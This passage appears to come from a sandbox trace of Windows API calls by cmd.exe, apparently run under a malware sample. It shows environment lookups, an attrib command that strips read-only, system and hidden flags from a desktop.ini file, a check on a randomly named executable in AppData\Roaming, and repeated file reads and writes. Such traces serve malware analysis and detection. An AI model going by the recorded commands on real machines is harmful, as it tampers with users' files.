"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.098] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.098] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.098] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.098] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.098] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.098] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.098] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.098] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0236.098] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.098] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0236.098] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.098] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.098] GetEnvironmentStringsW () returned 0x4a25f0* [0236.098] FreeEnvironmentStringsW (penv=0x4a25f0) returned 1 [0236.098] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.098] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.098] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.098] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.098] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.098] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.098] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.098] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.098] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.098] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.099] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf4d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf4d8, lpFilePart=0x2cf4d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf4d4*="Desktop") returned 0x18 [0236.099] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.099] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf254 | out: lpFindFileData=0x2cf254) returned 0x4a0c80 [0236.099] FindClose (in: hFindFile=0x4a0c80 | out: hFindFile=0x4a0c80) returned 1 [0236.099] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf254 | out: lpFindFileData=0x2cf254) returned 0x4a0c80 [0236.099] FindClose (in: hFindFile=0x4a0c80 | out: hFindFile=0x4a0c80) returned 1 [0236.099] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf254 | out: lpFindFileData=0x2cf254) returned 0x4a0c80 [0236.099] FindClose (in: hFindFile=0x4a0c80 | out: hFindFile=0x4a0c80) returned 1 [0236.099] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.099] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.100] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.100] GetEnvironmentStringsW () returned 0x4a04a0* [0236.100] FreeEnvironmentStringsW (penv=0x4a04a0) returned 1 [0236.100] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.100] GetConsoleOutputCP () returned 0x1b5 [0236.104] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.104] GetUserDefaultLCID () returned 0x409 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf618, cchData=128 | out: lpLCData="0") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf618, cchData=128 | out: lpLCData="0") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf618, cchData=128 | out: lpLCData="1") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0236.105] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.106] GetConsoleTitleW (in: lpConsoleTitle=0x490ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.108] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.108] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.108] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.108] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0236.108] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0236.108] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0236.109] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0236.109] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0236.109] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0236.109] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0236.110] _wcsicmp (_String1="del", _String2=")") returned 59 [0236.110] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0236.110] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0236.110] _wcsicmp (_String1="IF", _String2="del") returned 5 [0236.110] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0236.110] _wcsicmp (_String1="REM", _String2="del") returned 14 [0236.111] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0236.112] _wcsicmp (_String1="type", _String2=")") returned 75 [0236.112] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0236.112] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0236.112] _wcsicmp (_String1="IF", _String2="type") returned -11 [0236.112] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0236.112] _wcsicmp (_String1="REM", _String2="type") returned -2 [0236.112] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0236.131] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.131] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0236.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.136] FindClose (in: hFindFile=0x4a2530 | out: hFindFile=0x4a2530) returned 1 [0236.136] FindClose (in: hFindFile=0x4a2530 | out: hFindFile=0x4a2530) returned 1 [0236.136] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0236.137] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0236.137] GetConsoleTitleW (in: lpConsoleTitle=0x2cf040, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.137] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ceec8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cef90 | out: lpAttributeList=0x2ceec8, lpSize=0x2cef90) returned 1 [0236.137] UpdateProcThreadAttribute (in: lpAttributeList=0x2ceec8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cef88, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ceec8, lpPreviousValue=0x0) returned 1 [0236.137] GetStartupInfoW (in: lpStartupInfo=0x2cee84 | out: lpStartupInfo=0x2cee84*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0236.137] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0236.138] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cef24*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cef70 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessInformation=0x2cef70*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa38, dwThreadId=0xa3c)) returned 1 [0236.140] CloseHandle (hObject=0x4c) returned 1 [0236.140] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0236.140] GetEnvironmentStringsW () returned 0x4a09d0* [0236.140] FreeEnvironmentStringsW (penv=0x4a09d0) returned 1 [0236.140] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0236.201] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cee64 | out: lpExitCode=0x2cee64*=0x0) returned 1 [0236.201] CloseHandle (hObject=0x50) returned 1 [0236.201] _vsnwprintf (in: _Buffer=0x2cefac, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cee70 | out: _Buffer="00000000") returned 8 [0236.201] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0236.201] GetEnvironmentStringsW () returned 0x4a2580* [0236.201] FreeEnvironmentStringsW (penv=0x4a2580) returned 1 [0236.202] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0236.202] GetEnvironmentStringsW () returned 0x4a2580* [0236.202] FreeEnvironmentStringsW (penv=0x4a2580) returned 1 [0236.202] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ceec8 | out: lpAttributeList=0x2ceec8) [0236.202] GetConsoleTitleW (in: lpConsoleTitle=0x2cf248, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.202] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1\\desktop.ini")) returned 0x80 [0236.202] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1")) returned 0x14 [0236.202] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0236.203] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0236.203] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1\\desktop.ini")) returned 0x80 [0236.203] FindNextFileW (in: hFindFile=0x4a13e8, lpFindFileData=0x4a360c | out: lpFindFileData=0x4a360c) returned 0 [0236.203] GetLastError () returned 0x12 [0236.203] FindClose (in: hFindFile=0x4a13e8 | out: hFindFile=0x4a13e8) returned 1 [0236.205] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0236.205] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.206] GetFileType (hFile=0x50) returned 0x1 [0236.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.206] GetFileType (hFile=0x50) returned 0x1 [0236.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.206] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.207] GetFileType (hFile=0x50) returned 0x1 [0236.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.207] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.208] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.208] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.210] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.210] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.211] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.211] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, 